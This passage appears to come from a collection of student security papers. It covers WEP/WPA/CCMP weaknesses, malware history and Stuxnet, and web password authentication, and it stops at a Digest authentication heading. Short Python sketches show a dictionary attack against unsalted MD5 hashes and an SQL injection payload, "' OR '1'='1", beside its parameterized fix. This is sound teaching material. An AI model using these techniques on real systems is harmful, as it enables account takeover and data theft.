• As a result, CCMP handles many of the weaknesses encountered in WPA and WEP.

5.4 Weaknesses:
• The effective strength of the key is limited to 2^(n/2) operations (n: the number of bits in the key) because of generic meet-in-the-middle attacks [26].

6 Conclusions:
Every protocol has its strengths and weaknesses, because there is always a trade-off between simplicity and performance. As the examples above show, mechanisms that are cheap to implement tend to have severe problems when faced with intentional attackers, while added complexity, as in WEP's successors, raises the protocol's security level and makes the attacker's task far more complicated. After evaluating the strengths and weaknesses of each protocol, a trend is clear: newly invented protocols always show fewer weaknesses than the ones they replace. This is not necessarily because the new protocols actually have fewer weaknesses, but because those weaknesses have not yet been discovered. Just before the invention of WPA, WEP was warmly received and positively reviewed, with few known weaknesses. A protocol can thus be used widely as long as its core weaknesses remain undiscovered; once they are found, a new protocol with higher complexity has to be invented.

7 References:
1. Lars R. Knudsen and John Erik Mathiassen, 2004, On the Role of Key Schedules in Attacks on Iterated Ciphers.
2. Arvind Doraiswamy, 2006, Palisade, http://palisade.plynt.com/issues/2006Dec/wep-encryption/
3. Peterson, W. W. and Brown, D. T., Jan 1961, Cyclic Codes for Error Detection.
4. Nikita Borisov, Ian Goldberg, David Wagner, 12 Sep 2006, Intercepting Mobile Communications: The Insecurity of 802.11.
5. Maria George and Peter Alfke, 30 Apr 2007, Linear Feedback Shift Registers in Virtex Devices, http://www.xilinx.com/support/documentation/application_notes/xapp210.pdf
6. Ivan Ristic, 18 Oct 2008, Net Security, http://www.net-security.org/article.php?id=1638
7. Seth Fogie, 16 Mar 2008, WPA Part 2: Weak IVs, InformIT, http://www.informit.com/guides/content.aspx?g=security&seqNum=85
8. Scott Fluhrer, Itsik Mantin, and Adi Shamir, 2001, Weaknesses in the Key Scheduling Algorithm of RC4.
9. Cam-Winget, Nancy; Housley, Russ; Wagner, David; Walker, Jesse, May 2003, Security Flaws in 802.11 Data Link Protocols.
10. Thom Stark, Mar 2008, WEP2, Credibility Zero, starkrealities.com.
11. Business Wire, 2001, Agere Systems is First to Solve Wireless LAN Wired Equivalent Privacy Security Issue, http://findarticles.com/p/articles/mi_m0EIN/is_2001_Nov_12/ai_79954213/?tag=content;col1
12. Kevin Beaver, 10 Jan 2010, Understanding WEP Weaknesses, Wiley Publishing, http://www.dummies.com/how-to/content/understanding-wep-weaknesses.html
13. Meyers, Mike, 2004, Managing and Troubleshooting Networks, Network+, McGraw Hill, ISBN 978-0-07-225665-9.
14. Bradley Mitchell, 21 Aug 2008, AES vs TKIP for Wireless Encryption, http://compnetworking.about.com/b/2008/08/21/aes-vs-tkip-for-wireless-encryption.htm
15. Edney, Jon; Arbaugh, William A., 15 Jul 2003, Real 802.11 Security: Wi-Fi Protected Access and 802.11i, Addison Wesley Professional.
16. IEEE-SA Standards Board, Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications, Communications Magazine, IEEE, 2007.
17. Ciampa, Mark, 2006, CWNA Guide to Wireless LANs, Networking, Thomson.
18. IEEE Standards Association, 12 June 2007, IEEE 802.11, Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications.
19. Wei Dai, April 2007, VMAC: Message Authentication Code using Universal Hashing, CFRG Working Group.
20. Message authentication code, Wikipedia, 4 Nov 2011, http://en.wikipedia.org/wiki/Message_authentication_code
21. Martin Beck and Erik Tews, Practical Attacks Against WEP and WPA, http://dl.aircrack-ng.org/breakingwepandwpa.pdf
22. Vivek Ramachandran, 25 May 2011, Wireless LAN Security Megaprimer Part 23: WPA2-PSK Cracking, http://www.securitytube.net/video/1911
23. Toshihiro Ohigashi and Masakatu Morii, A Practical Message Falsification Attack on WPA, http://jwis2009.nsysu.edu.tw/location/paper/A%20Practical%20Message%20Falsification%20Attack%20on%20WPA.pdf
24. Jonsson, Jakob, 15 May 2010, On the Security of CTR + CBC-MAC, http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/ccm/ccm-ad1.pdf
25. Cole, Terry, 12 June 2007, IEEE Std 802.11-2007, New York: The Institute of Electrical and Electronics Engineers, http://standards.ieee.org/getieee802/download/802.11-2007.pdf
26. Whiting, D. (Hifn); Housley, R. (Vigil Security); Ferguson, N. (MacFergus), Sep 2003, Counter with CBC-MAC (CCM), RFC 3610, http://tools.ietf.org/html/rfc3610
27. Ciampa, Mark, 2009, Security+ Guide to Network Security Fundamentals, 3rd ed., Boston, MA: Course Technology, pp. 205, 380, 381.

Malicious Software: From Neumann's Theory of Self-Replicating Software to World's First Cyber Weapon
Kaarel Nummert
School of Computing, National University of Singapore, 21 Lower Kent Ridge Road, Singapore 119077
[email protected]

Abstract. When John von Neumann was giving his lectures on the theory of self-replicating programs, only science fiction authors could have imagined how rapidly the technology of malware would develop, and that 60 years after his lectures this theory would be used to create a weapon to sabotage Iran's nuclear program.

1 Introduction
1.1 Motivation
Motivation for this project came from the essay "The Growing Harm of Not Teaching Malware" by George Ledin. Professor Ledin explains how current computer science students' "knowledge of malware is roughly on a par with that of the general population of amateur computer users". This project is an attempt to change that.

1.2 What is Malware?
The term malware, short for malicious software, is used to describe software that has hidden, hostile, intrusive or annoying functionality. Based on its functionality and purpose, malware is often categorized into computer viruses, worms, trojan horses, spyware, adware, scareware, crimeware and rootkits.

2 History of Malware
Although academic work on computer viruses began as early as 1949 with John von Neumann's lectures on "Theory and Organization of Complicated Automata", where he discussed self-replicating programs, it was not until the 1970s that the first computer viruses were written and spread in public.

2.1 Pervading Animal
In January 1975, John Walker created a game called ANIMAL, which contained a subroutine PERVADE.
The game would ask the player to answer 20 questions about an animal he is thinking of and then try to guess which animal it is. While the user answered the questions, the PERVADE subroutine would go through every directory accessible to the user and copy the latest version of ANIMAL into it. ANIMAL was written for UNIVAC 1108 series mainframes, and it represents the first trojan horse in the history of computers.[6]

2.2 Brain
The first computer virus to infect PC computers was written in January 1986 in Pakistan. It was named Brain after the company its authors ran, Brain Computer Services. Surprisingly, the contact details of the authors of Brain were included in the source code. Since the internet as we know it today did not yet exist, the virus spread via floppy discs. Despite this seemingly inefficient method of spreading, it actually reached all over the world; one of the first calls the authors of the virus received was from Miami University. Brain infected the boot sector of floppy discs formatted with the DOS FAT file system. Although the purpose of the virus was to experiment with the security of MS-DOS, and it contained no destructive behaviour, once it had spread to a large number of computers in the United Kingdom and the United States the authors were forced to close the phone numbers revealed in the virus because of the overwhelming number of phone calls.[8]

2.3 Jerusalem Virus
While ANIMAL and Brain were non-destructive viruses, the Jerusalem Virus, detected in the city of Jerusalem in October 1987, would destroy all executable files on every occurrence of Friday the 13th. The Jerusalem Virus is known as the first computer virus to cause deliberate harm to the infected system, and it caused a worldwide epidemic in 1988 when its first trigger date, May 13th, 1988, occurred.

2.4 Viruses Become Multipartite and Polymorphic
In October 1989, the Icelander Fridrik Skulason discovered Ghostball, which carried out several damaging actions on the infected system, making it the first multipartite virus. In 1990, Mark Washburn and Ralf Burger developed the Chameleon family, the first family of polymorphic viruses. Polymorphic viruses mutate themselves while maintaining the original algorithm, making themselves more difficult for anti-virus software to discover. The first widespread polymorphic virus found outside laboratories was Tequila, found in 1991.

2.5 Rootkits
In 1990, Lane Davis and Steven Dake wrote the first rootkit. The rootkit was initially named after its purpose of providing privileged ("root") access on the UNIX operating system, but since rootkits were soon created for the Microsoft Windows and Mac OS X operating systems as well, the term now stands for malware that provides an attacker with continuous privileged access to the infected system.[2]

2.6 Melissa
Discovered on March 26, 1999, Melissa was the first mass-mailing macro virus. Despite not originally being designed for harm, it shut down several Internet mailing systems that could not handle the load of e-mails the virus sent to propagate itself. Melissa was not a standalone program but part of Microsoft Office documents and spreadsheets, and it used the user's contact list in Microsoft Outlook to send itself to new victims.
Melissa was written by David Smith, who was initially sentenced to 10 years but served only 20 months in a federal prison and was fined $5,000.[7]

2.7 StormWorm
StormWorm was an e-mailer worm that used social engineering, appearing to come from the addressee's trusted contacts, with attached binaries or malicious code hidden in Microsoft Office attachments. Once these reached the victim's system, they launched well-known client-side attacks on Microsoft Internet Explorer and Microsoft Office. StormWorm is a peer-to-peer botnet framework and backdoor trojan horse that affects computers running Microsoft Windows. Discovered on January 17th, 2007, StormWorm uses a decentralized command-and-control technique to increase its chances of survival, because there is no central point of control. Each infected machine knows 25 to 50 others, so it is hard to track down all infected machines. Hence StormWorm's size was never calculated, but it is estimated to have ranged from 1 to 10 million victim systems, the single largest botnet herd in history.[1]

2.8 Stuxnet
Stuxnet is considered the most important malware in history. It was discovered in June 2010 and was the first malware that spies on industrial systems and the first to include a programmable logic controller (PLC) rootkit. What makes it even more significant is its level of sophistication and its target. It used an unprecedented four zero-day (unknown to the software developer) attacks on Windows systems, parts of it were digitally signed, an equivalent testing facility of the final target was used to test the code during development, and it was targeted to compromise Iranian nuclear enrichment plants, in which it likely succeeded.

3 Case Study: Stuxnet
Stuxnet was not an evolution in the world of malware but a revolution: the world's first real cyber weapon.

3.1 Possible Attack Scenario
Since the targets of Stuxnet were industrial control systems (ICS) operated by specialized assembly-like code on programmable logic controllers (PLC), and each PLC is configured in a unique manner, the attackers must have had the ICS's schematics. These were possibly obtained by another piece of malware or by an insider in the final target organization. Analysis of Stuxnet shows that it was carefully tailored for a specific ICS. Researchers at Symantec believe the attackers must have had a mirrored environment based on the obtained schematics, including ICS hardware, PLCs, modules and peripherals, to test their work on. The malicious binaries of Stuxnet contained driver files digitally signed by two companies. The certificates were probably stolen by physically entering the premises of these companies, as the two companies are in close physical proximity. The attackers behind Stuxnet targeted five organizations in Iran that they believed would help them reach their final target. Each of these initial targets was attacked in a separate attack between June 2009 and June 2010, and from these organizations Stuxnet spread on to others on its way to its final target, a nuclear enrichment facility in Iran. Researchers at Symantec claim that the shortest time between the compilation of Stuxnet and an attack on a system with the compiled result was just 12 hours. The fact that Stuxnet was designed to spread not via the internet but via infected USB memory sticks or the local network suggests that the attackers must have had immediate access to one of the initial targets.
So far researchers have managed to find three variants of Stuxnet, but they believe there is a fourth. One of the initial target organizations was attacked with all three variants, suggesting the attackers believed it to be a crucial step on their way to the final target.[3]

3.2 Discovering Stuxnet
Normally, Iran replaced up to 10 percent of its uranium-enriching centrifuges; in Natanz, the plant attacked by Stuxnet (as was later discovered), it would have been normal to decommission about 800 per year. In early 2010, as the International Atomic Energy Agency discovered, Natanz had to replace between 1,000 and 2,000 centrifuges within a few months. Although Iran was not required to explain the reason for replacing this abnormal number of centrifuges, it was clear something had damaged them. On June 17, 2010, Sergey Ulasen, head of the computer security firm VirusBlokAda in Belarus, received a report from a customer in Iran whose computer was stuck in a reboot loop. VirusBlokAda got hold of the virus on the customer's computer and quickly realized it was using a zero-day exploit in Windows Explorer to spread; the exploit allowed the virus to spread via infected USB sticks. On July 12, VirusBlokAda reported the exploit along with the virus to Microsoft. Within a few days, Microsoft had named the virus Stuxnet, from a combination of file names found in the code (.stub and MrxNet.sys). As computer security researchers started reverse engineering and analyzing the virus, it became clear that the virus had been released up to one year before it was discovered, and that it had been refined several times over that period. Stuxnet was also discovered to use two digital certificates issued by two different companies in Taiwan, RealTek Semiconductor and JMicron Technology, both headquartered in the same business park. Despite the use of a zero-day exploit (only a few viruses out of millions use one) and stolen certificates, Stuxnet at first seemed rather harmless. Experts determined that Stuxnet was designed to target Simatic WinCC Step7 software, an industrial control system by Siemens used to program the controllers that drive motors, valves and switches in various plants. Once Stuxnet was shared with computer security organizations, Nicolas Falliere, Liam O Murchu and Eric Chien, researchers at Symantec, discovered its actual sophistication. Stuxnet stored its decrypted malicious DLL files in memory only, to avoid detection by antivirus software, and then reprogrammed the Windows API to access these virtual DLL files, a technique never seen before. The researchers also discovered that Stuxnet was using not one but four zero-day exploits, and that it was programmed to report a detailed description of every infected system and to update the malicious software if needed. By eavesdropping on that traffic, researchers were able to determine that the majority of infected machines were located in Iran, making it clear that Iran was the centre of the infection. Further investigation revealed that once Stuxnet determined a system had Siemens Step7 software, it would replace the original Step7 commands and disable any automated alarms that might go off as a result of the malicious commands. It also masked what was happening on the PLC by intercepting status reports sent from the PLC to the Step7 machine and removing any sign of the malicious commands.
Finally, once the Symantec researchers had released their findings, the German computer security expert Ralph Langner discovered that Stuxnet was not aimlessly sabotaging PLCs but would only attack one matching a very specific configuration. It was at this point that the Stuxnet discoveries started to point towards the Natanz uranium enrichment plant described earlier.[5]

3.3 Duqu
In October 2011, computer security researchers came across a new backdoor known as Duqu. It was created by someone who had access to the source code of Stuxnet, most probably the same party that created Stuxnet, because the source code of Stuxnet has never been released; researchers and antivirus organizations only have the binaries. Unlike Stuxnet, Duqu does not target PLCs. Instead it collects various information about the infected system to be used in future attacks, making it a precursor to future Stuxnet-like attacks. The similarities with Stuxnet are more than obvious: both viruses share a similar driver, and like Stuxnet's, Duqu's driver is signed with a stolen certificate issued to a Taiwanese company. While Stuxnet was designed to function no longer than June 24, 2012, Duqu is reportedly designed to remove itself 36 days after infection.[4]

3.4 Aftermath
Although more than 100,000 computers in Iran, Europe and the United States have been found to be infected by Stuxnet, the actual attack was only conducted when suitable PLCs were found on the system. Although Stuxnet did not attack systems on its way to the final target, it kept a copy of itself on them so that it could communicate possible updates to the final target, which was isolated from untrusted networks.[3] It is likely that Stuxnet succeeded in completing its initial attack, but had it removed itself from the non-targeted systems once they were no longer needed, it might never have been discovered. Stuxnet has started a new era in the history of malware, and one can only hope that in another 35 years it will not be looked back on as a trivial virus, the same way ANIMAL and PERVADE are today.

References
1. Davis, M.A., Bodmer, S.M., LeMasters, A.: Hacking Exposed™ Malware & Rootkits: Malware & Rootkits Secrets and Solutions. The McGraw-Hill Companies (2010)
2. Aycock, J.: Computer Viruses and Malware. Springer Science+Business Media, LLC (2006)
3. Falliere, N., O Murchu, L., Chien, E.: W32.Stuxnet Dossier. Symantec Security Response (February 2011)
4. W32.Duqu: The Precursor to the Next Stuxnet. Symantec Security Response (November 2011)
5. http://www.wired.com/threatlevel/2011/07/how-digital-detectives-deciphered-stuxnet/all/1
6. http://www.fourmilab.ch/documents/univac/animal.html
7. http://en.wikipedia.org/wiki/Melissa_(computer_virus)
8. http://campaigns.f-secure.com/brain/virus.html

Password Authentication for Web Applications
Shi Hua Tan, Wen Jie Ea, Rudyanna Tan

Abstract. Web applications are vulnerable to a whole array of attacks when they are insecure, giving rise to threats to both the server and the client. In this paper, we explore the vulnerability of web applications through the five most common attacks on them, especially the threat of authentication hacking, highlighting the possible methods an attacker might utilize. Our focus is the analysis of the different possible ways of securing a web application using the different methods of password authentication. Finally, we evaluate the various methods discussed, offering suggestions on password authentication for web developers to employ.
Keywords: Password authentication, Web application security

1 Introduction
With vulnerabilities present in web applications, there is a need for security to protect one's sensitive data and improve one's security posture. If a site is vulnerable, an attacker can break into the system by proving to the application that he/she is a known and valid user, and then gain whatever privileges the administrator assigned to that user. Hence, if the attacker manages to enter as an administrative user with global access on the system, he/she has almost total control of the application together with its content.

1.1 Threats to Web Applications
Web applications offer services such as mail services, online shops, or database administration, which increase the exposed surface area through which a system can be exploited. Web applications are, by their nature, often widely accessible from the Internet, which means there is a very large number of potential attackers. These factors have made web applications a very attractive target for attackers, leading to numerous attack methods. In this paper, authentication hacking will be discussed in detail.

1.2 Authentication Hacking – What is it?
In general, an attacker first tries to reach the login screen, where the application requests a login and password. Next, he/she must enter a matching login and password that the application recognizes as correct and that carries high privileges in the system, in order to gain access. Among such attacks, password guessing is often one of the most effective techniques for defeating web authentication; it can be carried out either manually or via automated procedures.

1.3 Authentication Hacking – Possible Procedures
Network Sniffing. Network sniffing uses specialized hardware and software to access information not addressed to the sniffer, or to analyze networks to which the individual has no legitimate access [7]. When information is sent over a network, it is broken into packets, each containing a small amount of the information, the addresses of the receiver and sender, and some technical data. Specialized hardware or software can intercept and copy these packets. By analyzing the addresses and packet information, a person can learn about the internal network hardware and specific addresses, which may highlight a security vulnerability or a previously unknown way into the network. Information theft can arise because the packets carry small amounts of information that is only lightly encoded and thus unsecured; people can open the packets and search through the data for important information.

Malicious or Weak Security Websites.
Phishing. A phishing scam is an identity theft scam run via email. The email appears to come from a legitimate source such as a trusted business or financial institution and includes an urgent request for personal information, such as invoking a critical need to update an account immediately [6]. Clicking on the link provided in the email leads to an official-looking website; however, personal information provided to the site goes directly to the scam artist. People are tricked into providing personal information including credit card numbers, passwords, bank account numbers, ATM pass codes and identity numbers. Virus protectors and firewalls do not catch these phishing scams because they contain no suspicious code, while spam filters let them pass because they appear to come from legitimate sources.
Brute Force Attack. A brute force attack is a trial-and-error attack that cracks a password by trying every possible password, so as to access encrypted data or accounts without authorization [4]. A program can be used to enter all of the possible password combinations, letter combinations, number combinations and letter-and-number combinations, one by one, until the correct combination is found. This method of cracking codes can be difficult, but it is not impossible. Its success depends on the length of the password and the set of values it may contain. The success rate drops, however, if the account has security measures that lock it once an incorrect password has been entered a particular number of times.

Dictionary Attack. A dictionary attack is an attempt to use literally every word in the dictionary as a means of identifying the password associated with encrypted data or accounts [5]. To increase the potential for success, hackers try to utilize as many words as possible when planning a dictionary attack. The words can come from a traditional dictionary, from various technical or industry-related dictionaries and glossaries, and from dictionaries in different languages, all to increase the chances of matching the password. In addition, software can be used to scramble the contents of the dictionary so as to lock in on random collections of letters, and the hacker may mix in numbers and various kinds of punctuation, making it possible to identify more complex passwords. While this approach can be very effective when a single word is used as the password, it is much less likely to succeed if the user has chosen a complicated password. A short sketch of such an attack follows.
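The following minimal Python sketch, with an invented word list and invented accounts, runs a dictionary attack against a leaked table of unsalted MD5 password hashes, and shows why single-word passwords fall so quickly:

```python
import hashlib

def md5_hex(word: str) -> str:
    """Unsalted MD5 digest, as a weak site might store passwords."""
    return hashlib.md5(word.encode()).hexdigest()

# Hypothetical leaked table of unsalted password hashes.
leaked = {"alice": md5_hex("sunshine"), "bob": md5_hex("Gryffindor")}

# A real attack loads a large wordlist plus mangling rules (case changes,
# appended digits); three words suffice to demonstrate the principle.
wordlist = ["password", "sunshine", "Gryffindor"]

for user, digest in leaked.items():
    for word in wordlist:
        if md5_hex(word) == digest:
            print(f"{user}: password is {word!r}")
            break
```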
Pharming. Pharming is a type of Internet fraud in which the attacker attempts to redirect Internet users from legitimate websites to fraudulent or potentially malicious ones. It is somewhat similar to phishing [10]; pharming, however, attempts to redirect users to fraudulent websites without any bait message or other action by the user. Pharming attacks try to corrupt the very process by which a user accesses Internet websites, redirecting the user to a malicious website without the user ever knowing he/she is under attack. This can be achieved either through a compromised Domain Name System (DNS) server or through a compromised router or network.

Compromised Domain Name System (DNS) Server. DNS servers direct Internet users to websites by converting textual hostnames such as www.google.com into the numerical Internet protocol (IP) addresses that servers recognize. By poisoning a DNS server, a pharming attack allows an attacker to redirect large numbers of users from a legitimate website to a malicious one, without the users ever realizing an attack has happened [10]. The users type the correct hostname but are directed by the poisoned DNS server to the IP address of the malicious website. This malicious website can then either install malicious software on the users' computers, or appear legitimate and wait for the users to enter their private information, collecting it for fraudulent purposes.

Compromised router or network. This can be achieved through malicious software that rewrites the firmware built into the device [10]. Firmware is the software installed within a device itself which manages the device's basic functions regardless of the other hardware or software used with it. In the case of routers and network servers, the firmware usually includes directions for which DNS server the system should use. A pharming attack can therefore change this firmware to tell the router to use a DNS server that is either controlled by the attacker or has already been poisoned. Antivirus and firewall programs, on the whole, cannot protect users from pharming attacks; more sophisticated programs are needed to secure network servers and routers.

Malware on Client Machines.
Spyware. Spyware is software that utilizes a user's Internet connection, normally without the user's knowledge or permission, to send information from the user's personal computer to other computers [9]. The information sent can be a record of ongoing browsing habits, downloads, or even personal data.

Session Hijacking, Fabricated Transactions. Session hijacking happens when a third party takes over a web user's session by obtaining the session key and pretending to be the authorized user of that key [8]. Once the hijacker has successfully initiated the hijacking, he/she can use any of the privileges connected with that user to perform tasks, including using the information being passed between the original user and other participants. Depending on the type of actions taken, session hijacking may either be promptly noticeable to all participants involved or be almost undetectable. Session hijacking focuses on the protocols used to establish a user session: the session ID is typically stored in a cookie or embedded in a URL, and some form of user authentication is required to initiate the session. The hijacker can exploit defects in the security of the network to capture the important authentication information. Once the user is identified, the hijacker can monitor every data exchange that takes place during the session and use the data in any way he/she desires.

1.4 Vulnerability of Web Applications
While there are protective measures to identify and remove vulnerabilities, those measures may not be well implemented or sufficient; as such, vulnerabilities still exist in web applications. Five common web application attacks are discussed below, from the most critical to the least.

Remote Code Execution. Improper coding errors lead to remote code execution, which allows an attacker to run arbitrary, system-level code on the vulnerable server and retrieve any desired information [11]. Exploiting this vulnerability can also lead to a total system compromise with the same rights as the web server itself. It is difficult to discover this vulnerability during penetration tests, but problems are often revealed during a source code review.

SQL Injection. Through SQL injection, an attacker can retrieve crucial information from a web server's database [11]. The impact of the attack varies from basic information disclosure to remote code execution and total system compromise, depending on the application's security measures.
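The classic mistake and its standard remedy can be shown side by side in Python with the built-in sqlite3 module; the table, credentials and inputs below are invented for illustration:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")

supplied_user = "anyone' OR '1'='1"         # attacker-controlled input
supplied_pass = "wrong' OR '1'='1"

# VULNERABLE: string concatenation lets the input rewrite the query.
query = ("SELECT * FROM users WHERE name = '%s' AND password = '%s'"
         % (supplied_user, supplied_pass))
print(conn.execute(query).fetchall())       # returns the admin row!

# SAFE: parameterized placeholders keep the input as pure data.
rows = conn.execute("SELECT * FROM users WHERE name = ? AND password = ?",
                    (supplied_user, supplied_pass)).fetchall()
print(rows)                                 # []
```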
Format String Vulnerabilities. This vulnerability results from the use of unfiltered user input as the format string parameter in certain Perl or C functions that perform formatting [11]. An attacker can use specifiers such as %s, %x, %d and %u to mount denial-of-service, reading and writing attacks, in which the attacker respectively causes a program to crash, gains unauthorized access to information, and edits data.

Cross-Site Scripting (XSS). An attacker can craft a URL that appears legitimate at first glance, but when the victim opens the URL, the attacker can effectively execute something malicious in the victim's browser [11].

Username Enumeration. An attacker can exploit a back-end validation script that reveals whether the supplied username is correct or not [11]. From the different types of error message received, the attacker can determine valid usernames.

2 Password Authentication
Password authentication is the process of determining the identity of an individual who is accessing a system. It is typically achieved via a logon process with web user IDs or usernames, passwords and/or e-mail. It includes a setup process in which the user chooses his/her password and a hash of the password is stored in a password file. Later, when the user logs into the system by supplying his/her password, the system computes the hash of the password entered and compares it with the file. If the hash and the file match, the user has been authenticated; he/she can then be authorized to perform certain actions within the system. Various password authentication methods are discussed below.

Methods of Password Authentication
HTTP Basic Authentication. Basic HTTP authentication is so called because it is defined in the Hypertext Transfer Protocol (HTTP) standard. When a client requests a protected resource, the web server replies with a message header of the form "WWW-Authenticate: Basic" [24]. The web browser or client then provides a username and password with its request to the server: the username is joined to the password with a colon, and the resulting string is sent to the server in Base64 encoding, to be decoded there. For instance, the username HarryPotter and password Gryffindor are encoded from the string 'HarryPotter:Gryffindor'.

Implementation of Basic Authentication. A client requests access to a protected resource. The web server returns a dialog box that asks for the username and password of the client. The client then submits his/her username and password to the server and awaits validation. The server validates the credentials and, if successful, returns the requested resource to the client.

Fig 1. Using HTTP Basic Authentication to authenticate a client to a server. (Source: http://download.oracle.com/javaee/1.4/tutorial/doc/Security5.html)
Fig 2. HTTP basic authentication to connect to a secured server: requesting a username and password. (Source: http://wiki.openqa.org/display/WTR/Basic+Authentication)

Advantages and Disadvantages of HTTP Basic Authentication
Advantages: Basic access authentication is supported by all web browsers; in other words, it is a relatively simple scheme to implement. Sessions are stored in caches, which allows the user to access the server multiple times without having to log in each time.
Disadvantages: HTTP basic authentication is not particularly secure. Basic authentication sends usernames and passwords over the Internet as unencrypted plaintext, so it relies on the connection being secure or trusted, with no interception. This is compounded by the fact that the target server is not authenticated either, increasing the possibility of man-in-the-middle attacks. Although the caching of sessions is convenient, it is also insecure: information is retained in the session cache until the user clears his/her browsing history, so if the user does not properly log off the server, his/her information remains in the cache and another user can access the session without any password required [16].
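The header construction described above is trivially reversible, as a few lines of Python show (the HarryPotter credentials are the example from the text):

```python
import base64

username, password = "HarryPotter", "Gryffindor"

# What the browser sends in the Authorization header:
token = base64.b64encode(f"{username}:{password}".encode()).decode()
header = f"Authorization: Basic {token}"
print(header)    # Authorization: Basic SGFycnlQb3R0ZXI6R3J5ZmZpbmRvcg==

# Base64 is an encoding, not encryption: anyone on the wire reverses it.
print(base64.b64decode(token).decode())     # HarryPotter:Gryffindor
```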
Form Based Authentication. Form based authentication may seem somewhat similar to HTTP basic authentication; however, it does not use the HTTP authentication techniques. Instead, it uses HTML form fields for the username and password values [16].

Implementation of Form Based Authentication. When form based authentication is used, the server first checks the client's authentication. If the user is authenticated, the server returns a reference to the requested resource. Otherwise, the user is presented with a 'form' to fill in, which gives the method its name. He fills in the form, similar to a login, before being granted access to the site. If the login succeeds, the server redirects the client to the resource; upon failure, the client is redirected to an error page.

Fig 3. Using Form Based Authentication to authenticate a client to a server. (Source: http://download.oracle.com/javaee/1.4/tutorial/doc/Security5.html)

Advantages and Disadvantages of Form Based Authentication
Advantages: Sessions are timed. After a certain amount of idle time or inactivity, the session ends and the user must log in to the server again. This improves security slightly over HTTP basic authentication in cases where a user forgets to log off, and it is particularly useful for public access machines such as computer terminals in airports and LAN shops.
Disadvantages: Form based authentication has the same security issues as basic HTTP authentication: passwords are sent in plaintext, and the target server is not authenticated.

Client-Certificate Authentication. Client certificate authentication uses HTTP over Secure Sockets Layer (SSL). The procedure does not occur at the message layer using user IDs and passwords or tokens; instead, the authentication occurs during the handshake, using SSL certificates. [27]

Implementation of Client-Certificate Authentication. The client authenticates the server through public key certificates, which essentially use a digital signature to bind a public key to an identity, that is, to information such as the name of a person or an organization, making it secure. The public key certificate is issued by a trusted organization, a certificate authority (CA) such as VeriSign [18],[29]. The authentication uses public-key encryption and digital signatures to confirm that the server is who it claims to be. Upon authentication, the client and server use symmetric-key encryption to encrypt all the information they exchange.

Advantages and Disadvantages of Client-Certificate Authentication
Advantages: Authenticity is offered in the verification of the owner through the additional information given, such as the name of the person or organization. It is confidential in that it ensures the data transferred is not disclosed to unauthorized people. Because it is secure, it ensures that any modification of data is done only by the authorized person or company.
As such, any modification or transaction cannot be denied by the participant, ensuring non-repudiation [13],[17].
Disadvantages: Cost is the main disadvantage. In order to obtain a trusted infrastructure, the user needs to validate his/her identity with a trusted organization such as VeriSign [28]. Another disadvantage may be performance, owing to the larger amount of resources required when the information sent is encrypted.

Fig 4. Client-certificate authentication utilized in PayPal as proof to clients that it is a legitimate server. Certificate verified by VeriSign. (Source: RedHat, Certificates and Authentication)

Mutual Authentication. Mutual authentication, also known as two-way authentication, is a security feature or process in which both entities in a communications link authenticate each other. In a network environment, the end user (client side) must prove his/her identity to the web application provider (server side), and the server must prove its identity to the client, before any application traffic is sent over the connection. In other words, a connection can occur only when the client trusts the server's digital certificate and the server trusts the client's certificate [33]. Mutual authentication should not be confused with the two-factor authentication that electronic banking websites normally implement.

Implementation of Mutual Authentication. The exchange of certificates is carried out by means of the Transport Layer Security (TLS) protocol. A connection is only possible after the process of exchanging certificates and setting up connection properties, which is called the Secure Sockets Layer (SSL) handshake. If the client's keystore contains more than one certificate, the certificate with the latest timestamp is used to authenticate the client to the server [25]. This reduces the risk that an unsuspecting network user carelessly reveals account credentials to malicious websites. It is best implemented with HTTP over SSL for added security.

Fig 5. Using Mutual Authentication to verify the authenticity of both the client and server. (Source: http://download.oracle.com/javaee/1.4/tutorial/doc/Security5.html)

Advantages and Disadvantages of Mutual Authentication
Advantages: With mutual authentication, end users can be assured that they are communicating with legitimate web applications, and servers can ensure that all users are attempting to gain access for legitimate purposes. It prevents attackers from impersonating entities to steal users' account credentials and commit fraud [15]. Mutual authentication can also prevent various forms of online fraud such as man-in-the-middle attacks, malware, shoulder surfing, keystroke logging and pharming, minimizing the risk of online fraud in electronic banking and commerce activities.
Disadvantages: Most web applications are designed in such a way that no client-side certificates are required [14], because of issues of cost and complexity. The resulting lack of mutual authentication creates opportunities for man-in-the-middle attacks. Besides that, the management of root certificate authorities in client browsers, applications and operating systems is relatively important: for example, an attacker who can explicitly change the certificate-authority (CA) certificates in a client browser can trick the client into believing a malicious website is legitimate.
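In practice, mutual authentication over TLS means the server refuses the handshake unless the client also presents a certificate. A minimal sketch with Python's standard ssl module follows; all the certificate and key file names are hypothetical placeholders:

```python
import ssl

# Server side: present our own certificate and demand one from the client.
server_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_ctx.load_cert_chain(certfile="server.pem", keyfile="server.key")
server_ctx.verify_mode = ssl.CERT_REQUIRED   # reject clients without a certificate
server_ctx.load_verify_locations(cafile="trusted-client-ca.pem")

# Client side: verify the server *and* offer our own certificate.
client_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_ctx.load_verify_locations(cafile="trusted-server-ca.pem")
client_ctx.load_cert_chain(certfile="client.pem", keyfile="client.key")
```

With CERT_REQUIRED on the server context, the handshake itself carries the authentication, so no password ever crosses the wire.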
Digest Authentication. Digest authentication is an authentication method in which a request from a potential user is received by a network server and then sent to a domain controller [30]. The controller returns a digest session key to the server that received the request. The user then generates a response, which is encrypted before being sent to the server. If the response is correct, the server grants the user access to the web application for a single session.

Implementation of Digest Authentication. The authentication is based on a simple challenge-response paradigm. The server generates challenges using a nonce value. A valid response from the client contains, by default, an MD5 checksum of the username, the password, the nonce value provided, the HTTP method, and the requested URI, in the form specified in RFC 2617 [24]. The MD5 digest value is a 128-bit hash intended as a one-way message digest, but studies have shown that MD5 is breakable and not collision resistant [33].

Advantages and Disadvantages of Digest Authentication
